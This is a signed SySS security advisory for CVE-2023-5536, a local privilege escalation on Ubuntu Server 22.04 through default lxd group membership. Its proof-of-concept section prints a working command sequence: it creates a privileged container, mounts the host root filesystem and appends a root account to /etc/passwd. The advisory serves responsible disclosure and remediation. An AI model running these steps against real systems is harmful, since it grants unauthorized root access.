-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

﻿Advisory ID:               SYSS-2023-028
Product:                   Ubuntu Server
Manufacturer:              Canonical Ltd
Affected Version(s):       22.04.03 LTS
Tested Version(s):         22.04.03 LTS
Vulnerability Type:        Incorrect Default Permissions (CWE-276)
Risk Level:                Medium
Solution Status:           Fixed
Manufacturer Notification: 2023-09-28
Solution Date:             2023-12-11
Public Disclosure:         2023-12-11
CVE Reference:             CVE-2023-5536
Author of Advisory:        Tobias Jäger, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Ubuntu Server is a major server operating system.

The manufacturer describes the product as follows (see [1]):

"Ubuntu Server is a version of the Ubuntu operating system designed and
engineered as a backbone for the internet."

Due to incorrect default permissions, it is vulnerable to a local privilege
escalation.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Ubuntu Server comes with the lxd/lxc tools preinstalled. The default operating
system user is in the lxd group by default. Both configurations together lead to
a local privilege escalation to root. 

The default user is also in the sudo group, which allows escalating the
privileges if the password of the default user is known. For the privilege
escalation with the lxd group misconfiguration, the password is not needed.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

lowpriv@testserver:~$ whoami
lowpriv
lowpriv@testserver:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied
lowpriv@testserver:~$ groups
lowpriv adm cdrom sudo dip plugdev lxd
lowpriv@testserver:~$ lxc init ubuntu:20.04 container -c
security.privileged=true

Creating container
lowpriv@testserver:~$ lxc config device add container hostDisc disk source=/
path=/mnt/root recursive=true

Device hostDisc added to container
lowpriv@testserver:~$ lxc start container
lowpriv@testserver:~$ lxc exec container bash
root@container:~# cd /mnt/root/etc
root@container:/mnt/root/etc# echo
'newroot:$1$QF3RRiqz$KVluZW6Ec33MbChp3jjoH/:0:0:/root:/bin/bash' >> passwd

root@container:/mnt/root/etc# exit
exit
lowpriv@testserver:~$ su newroot
Password: 
# id
uid=0(root) gid=0(root) groups=0(root)


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Remove users from lxd group and configure multi-user LXD mode (see [4] and [5]).


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2023-09-24: Vulnerability discovered
2023-09-28: Vulnerability reported to manufacturer
2023-12-11: Patch released by manufacturer
2023-12-11: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Ubuntu Server
    https://ubuntu.com/server/docs
[2] SySS Security Advisory SYSS-2023-028
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-028.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] Easy multi-user LXD setup
    https://discourse.ubuntu.com/t/easy-multi-user-lxd-setup/26215/4
[5] Ubuntu CVE-2023-5536
    https://ubuntu.com/security/CVE-2023-5536
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Tobias Jäger of SySS
GmbH.

E-Mail: tobias.jaeger@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Tobias_Jaeger.asc
Key ID: 0xABF0CF2F4D0220F9
Key Fingerprint: 5C9F 5312 F37E B9AB E87B 1212 ABF0 CF2F 4D02 20F9

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEXJ9TEvN+uavoexISq/DPL00CIPkFAmXqx60ACgkQq/DPL00C
IPlwLw//UQLte/mXqEzDu8ryq6Kt0o8W8090qarlv8/AkvXe1R1nyMFkFv1UAUwp
vapUpHdH4HYL7aiDT56BxPWmmrxB4FM7m3R0DjmOTTD4uT27xQ9u1C7ZiHbdkWnA
t7F7Ms4ZLbjGKI6R0qvo4oe1ZOicN4UyxachlY/yCPWf7Wd3hICavb3frhOLjMqi
MuiB6BqnRYsrbPyZBlu0UsObCLV4sl83eh78S2qllbSF/id9WUWkkfBqOkGAAZPL
Ghw2b118Xo2+tdlXn5GkqZR+nW0OHBVFHf8N7QvEh2dL/SHmI3RZvwdXXfRu9map
cnHLuzYVLWvyZ/DbqqcIETbgJfNKURcP533iHJNOMMPNgJJalWH9ba4h8m2PudT4
OGakQNg38ME+qTHqvl+wQQV5NLRP4kz+L/YtnHCPUdw+xwO57U5np/BE+gMesX+S
rSSZVwPf/9b42cqwuJupLUMwUVECwWLr6H84OJEjPZune/5ZS/ABbJbND/P5bG1I
25qNVhO09o+Lgw+8wSydU0cTds7oRGXO0Bppek6Y/6Uj3AeJWcDMdbbFu+/0CS0X
EW953C9ctfhEra3eup/Dlk4LFouqn0Z84XQj6KEl27nNyB9fyFWNUJn7oCBsu9I2
KleOLzt7hea3sLC8iuNq/1c+Xn74cOoyi7QchwpuibNwlBr4Kp8=
=mQNL
-----END PGP SIGNATURE-----